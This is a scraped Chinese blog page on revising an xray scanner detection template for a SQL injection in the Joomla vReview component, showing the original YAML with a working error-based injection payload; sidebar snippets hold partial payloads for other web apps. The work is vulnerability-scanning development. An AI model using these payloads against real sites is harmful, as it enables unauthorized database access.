xray插件改良8-poc-yaml-joomla-component-vreview-sql

最新推荐文章于 2024-03-20 20:26:28 发布

_HWHXY

最新推荐文章于 2024-03-20 20:26:28 发布

阅读量339

点赞数

分类专栏： Xray插件

本文链接：https://blog.csdn.net/xiru9972/article/details/115216099

版权

xray插件改良8-poc-yaml-joomla-component-vreview-sql

前言

原始yml

name: poc-yaml-joomla-component-vreview-sql
set:
  r1: randomInt(800000000, 1000000000)
rules:
  - method: POST
    path: /index.php?option=com_vreview&task=displayReply
    headers:
      Content-Type: application/x-www-form-urlencoded
    body: >-
      profileid=-8511 OR 1 GROUP BY CONCAT(0x7e,md5({
  {r1}}),0x7e,FLOOR(RAND(0)*2)) HAVING MIN(0)#
    follow_redirects: true
    expression: |
      response.body.bcontains(bytes(substr(md5(string(r1)), 0, 31)))
detail:
  author: 南方有梦(https://github.com/hackgov)
  Affected Version: "1.9.11"
  links:
    - https://www.exploit-db.com/exploits/46227

根据links：https://www.exploit-db.com/exploits/46227
找到原始漏洞描述，发现存在两个poc，故而做出如下修改

name: poc-yaml-joomla-component-vreview-sql
set:
  r1: randomIn

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

_HWHXY

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

xray完美插件poc-yaml-etouch-v2-sqli

计算机毕业论文源码，学生个人网页制作html源码。贴近用户做网络推广和互联网优化。

09-14

1276

原始yml:name: poc-yaml-etouch-v2-sqli name: poc-yaml-etouch-v2-sqli rules:- method: GET path: >-/upload/mobile/index.php?c=category&a=asynclist&price_max=1.0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1),0x7e,FLOOR(RAND(0)*2))x%20FROM%20IN

poco:Poco将使用简单的YAML配置文件帮助您组织和管理各种复杂程度的Docker，Docker-Compose，Kubernetes，Openshift项目，从而缩短从查找项目到在本地环境中初始化项目的路线

05-03

POCO Poco使用简单的YAML配置文件帮助组织和管理各种复杂性的Docker，Docker-Compose，Kubernetes项目，从而缩短了从查找项目到在本地环境中初始化项目的路线。很简单。使用非常简单的命令行界面配置，运行和在项目之间切换。灵活性强。轻松管理，扩展和维护任何复杂性的项目。配置一次，到处使用。一次配置项目，以便团队其他成员将感受到零配置的价值。特征开箱即用的Docker，Docker-Compose，Kubernetes，Helm支持。 Git，SVN支持开箱即用。项目目录，多个目录。创建您自己的项目目录。无需其他工具即可组织您的项目。多个计划。为不同的环境甚至是出于演示目的的环境创建多个计划。轻松地在计划（环境）之间切换。简单的配置文件。 Poco有助于拆分配置文件，因此可以随时轻松维护和扩展它们。脚本支持（挂钩

参与评论您还未登录，请先登录后发表或查看评论

xray插件改良5-poc-yaml-duomicms-sqli

HWHXY的博客

03-23

591

xray插件改良5-poc-yaml-duomicms-sqli 前言 poc-yaml-duomicms-sqli原始的ymlpoc-yaml-duomicms-sqli name: poc-yaml-duomicms-sqli rules: - method: GET path: >- /duomiphp/ajax.php?action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5(20

编写Yaml文件当Poc,利用Nuclei扫描器去扫描漏洞

XXokok的博客

12-09

2068

编写Yaml文件当Poc,利用Nuclei扫描器去扫描漏洞。使用工具一键生成Yaml文件

xray插件改良4-poc-yaml-dlink-dsl-2888a-rce

HWHXY的博客

03-23

456

xray插件改良4-poc-yaml-dlink-dsl-2888a-rce 前言 poc-yaml-dlink-dsl-2888a-rce原始的yml poc-yaml-dlink-dsl-2888a-rce name: poc-yaml-dlink-dsl-2888a-rce rules: - method: GET path: /page/login/login.html follow_redirects: false expression: | respons

漏洞发现-漏扫项目篇&Poc开发&Yaml语法&反链判断&不回显检测&Yaml生成

最新发布

siu~

03-20

993

1、Xray&Afrog-Poc开发-环境配置&编写流程 2、Xray-Poc开发-数据回显&RCE不回显&实验室 3、Afrog-Poc开发-数据回显&RCE不回显&JDNI注入章节点：漏洞发现-Web&框架组件&中间件&APP&小程序&系统扫描项目-综合漏扫&特征漏扫&被动漏扫&联动漏扫 Poc开发-Ymal语法&联动导入&项目拓展扫描插件-Burpsuite插件&浏览器插件&自动模版

xray插件改良3-poc-yaml-dlink-850l-info-leak

HWHXY的博客

03-23

1143

xray插件改良3-poc-yaml-dlink-850l-info-leak 前言 poc-yaml-dlink-850l-info-leak原始的yml poc-yaml-dlink-850l-info-leak name: poc-yaml-dlink-850l-info-leak rules: - method: POST path: /hedwig.cgi headers: Content-Type: text/xml Cookie: uid=R8tBj

xray插件改良2-poc-yaml-dedecms-cve-2018-6910

HWHXY的博客

03-23

1354

xray插件改良2-poc-yaml-dedecms-cve-2018-6910 前言 poc-yaml-dedecms-cve-2018-6910原始的yml dedecms-cve-2018-6910.yml name: poc-yaml-dedecms-cve-2018-6910 rules: - method: GET path: /include/downmix.inc.php expression: | response.status == 200 &&a

xray插件改良7-poc-yaml-etouch-v2-sqli

HWHXY的博客

03-24

1188

xray插件改良7-poc-yaml-etouch-v2-sqli 前言原始yml name: poc-yaml-etouch-v2-sqli rules: - method: GET path: >- /upload/mobile/index.php?c=category&a=asynclist&price_max=1.0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1),0x7e

xray插件改良6-poc-yaml-ecshop-360-rce

HWHXY的博客

03-23

608

xray插件改良6-poc-yaml-ecshop-360-rce 前言原始yml name: poc-yaml-ecshop-360-rce set: r1: randomInt(40000, 44800) r2: randomInt(40000, 44800) rules: - method: POST path: /user.php headers: Referer: >- 45ea207d7a2b68c49582d2d22adf953a

漏洞复现-poc-yaml-docker-unauthorized-rce-ssh认证连接

qq_45234543的博客

11-23

2536

漏洞复现-poc-yaml-docker-unauthorized-rce-ssh认证连接，docker未授权漏洞利用，ssh密钥连接

记一次内网靶机实战

千寻的博客

11-05

1993

记一次内网靶机实战记录，1、shiro反序列化漏洞 2、strut2漏洞 3、Drupal漏洞 4、内网代理工具 5、数据库连接工具 6、window的samba漏洞 7、viper的使用

xray Web扫描器学习记录

weixin_50464560的博客

06-06

4186

简介项目地址:https://github.com/chaitin/xray 长亭科技研发的一款完善的安全评估工具，支持常见Web安全问题扫描和自定义POC，虽然Github有项目，但是不开源，只提供社区版本供大家使用。基本使用代理模式代理模式下的基本架构为，扫描器作为中间人，首先原样转发流量，并返回服务器响应给浏览器等客户端，通讯两端都认为自己直接与对方对话，同时记录该流量，然后修改参数并重新发送请求进行扫描。这种原理和Burpsuite的自带的漏扫原理是一样的。生成ca证书Bash# 生成 .

Joomla漏洞

热门推荐

Grey的博客

07-09

1万+

开始复现漏洞

GhostScript 沙箱绕过（命令执行）漏洞（CVE-2018-16509）

黑白的博客

12-22

1283

声明好好学习，天天向上漏洞描述 8 月 21 号，Tavis Ormandy 通过公开邮件列表，再次指出 GhostScript 的安全沙箱可以被绕过，通过构造恶意的图片内容，将可以造成命令执行、文件读取、文件删除等漏洞 GhostScript 被许多图片处理库所使用，如 ImageMagick、Python PIL 等，默认情况下这些库会根据图片的内容将其分发给不同的处理方法，其中就包括 GhostScript。影响范围 Ghostscript 9.24之前版本复现过程这里使用7.0.8版本使

Joomla 3.4.6 RCE复现及分析

whojoe的博客

05-01

945

Joomla 3.4.6 RCE复现及分析前言环境搭建漏洞复现exp分析参考文章前言前几天看了下PHP 反序列化字符逃逸学习，有大佬简化了一下joomla3.4.6rce的代码，今天来自己分析学习一下环境搭建 Joomla 3.4.6 : https://downloads.joomla.org/it/cms/joomla3/3-4-6 php ：5.4.45nts（不支持php7）影响版...

Joomla SQL注入漏洞（CVE-2018-8045）复现

玄道的网安博客

09-29

2092

简介 Joomla!是一套全球知名的内容管理系统。Joomla!是使用PHP语言加上MySQL数据库所开发的软件系统影响版本 joomla版本 v3.5.0 ~ v3.8.5 漏洞原理可以看到对filter.category_id这个参数进行了一个强制int类型转换也就是说漏洞发生在此参数上根据notes.php，触发的代码为 $categoryId这个参数没有经过任何过滤直接拼接到了sql语句中，造成sql注入环境搭建下载地址https:/...

xray-core v1.8.4

12-15

xray-core v1.8.4 是一个功能强大的 X 光扫描工具，它可以帮助用户检测和分析网络中的安全漏洞和风险。这个版本带来了一些重要的更新和改进，包括增强的扫描性能和更精确的漏洞识别能力。另外，还修复了一些已知的 bug，提高了软件的稳定性和可靠性。该版本的 xray-core 支持多种漏洞扫描技术，并且具有灵活的配置选项，用户可以根据自身需求进行定制化设置。它还可以生成详细的扫描报告，帮助用户全面了解网络中存在的安全风险，并提供相应的解决建议。此外，xray-core 还提供了友好的用户界面和丰富的文档资料，方便用户进行操作和学习。总的来说，xray-core v1.8.4 是一款功能强大、稳定可靠的安全工具，适合企业和个人用户进行网络安全扫描和风险评估。它的持续更新和改进也表明了开发团队对于产品质量和用户体验的高度重视，相信在未来的发展中会有更多令人期待的功能和性能提升。如果你正在寻找一款专业的网络安全扫描工具，不妨尝试一下 xray-core v1.8.4，相信它会给你带来很好的使用体验。